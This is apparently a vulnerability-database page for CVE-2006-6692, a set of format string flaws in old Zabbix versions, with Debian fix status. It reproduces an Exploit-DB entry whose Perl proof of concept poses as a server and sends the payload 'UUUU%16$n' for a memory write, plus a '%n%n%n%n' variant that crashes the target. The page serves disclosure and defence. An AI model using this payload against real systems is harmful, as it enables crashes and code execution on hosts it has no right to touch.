CVE-2006-6692

unknown

Published — · Modified —

💬 Discuss on Community ✚ Propose mitigation

CVSS v3

—

CVSS v4 NEW

—

not yet in upstream

VIR risk

1.0

Description

Multiple format string vulnerabilities in zabbix before 20061006 allow attackers to cause a denial of service (application crash) and possibly execute arbitrary code via format string specifiers in information that would be recorded in the system log using (1) zabbix_log or (2) zabbix_syslog.

Predictions

Exploit likelihood

20%

Patch ETA

—

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or — if you've already worked around this in production — publish your fix to the community-verified tier.

✚ Propose a mitigation on Community → Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-28775 dos linux verified text · 1 KB

Max Vozeler · 2006-10-09

Zabbix 1.1.2 - Multiple Remote Code Execution Vulnerabilities

text exploit Source: Exploit-DB

source: https://www.securityfocus.com/bid/20416/info

ZABBIX is prone to multiple unspecified remote code-execution vulnerabilities. 

Reports indicate that these issues facilitate format-string and buffer-overflow attacks. A remote attacker may leverage these vulnerabilities to trigger denial-of-service conditions or to execute arbitrary code to gain unauthorized access to a vulnerable computer. This would occur in the context of the application.

ZABBIX version 1.1.2 is reported vulnerable; other versions may be affected as well.

#!/usr/bin/perl --

# zabbix-exploiter
# by Ulf Harnhammar in 2006
# I hereby place this program in the public domain.

use IO::Socket;
$server = IO::Socket::INET->new( Proto     => 'tcp',
                                 LocalPort => 10050,
                                 Listen    => SOMAXCONN,
                                 Reuse     => 1);
die "can't create server\n" if !$server;

while ($client = $server->accept())
{
  $client->autoflush(1);
  $key = <$client>; print $key;
  print $client 'UUUU%16$n'; # writes data to 0x55555555, at least on Debian testing
  # print $client '%n%n%n%n'; # crashes
  close $client;
}

OS impact

Debian Fixed 5 releases

Version	Status	Fixed in
trixie	Fixed	`1:1.1.2-4`
sid	Fixed	`1:1.1.2-4`
forky	Fixed	`1:1.1.2-4`
bullseye	Fixed	`1:1.1.2-4`
bookworm	Fixed	`1:1.1.2-4`

References

https://security-tracker.debian.org/tracker/CVE-2006-6692

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.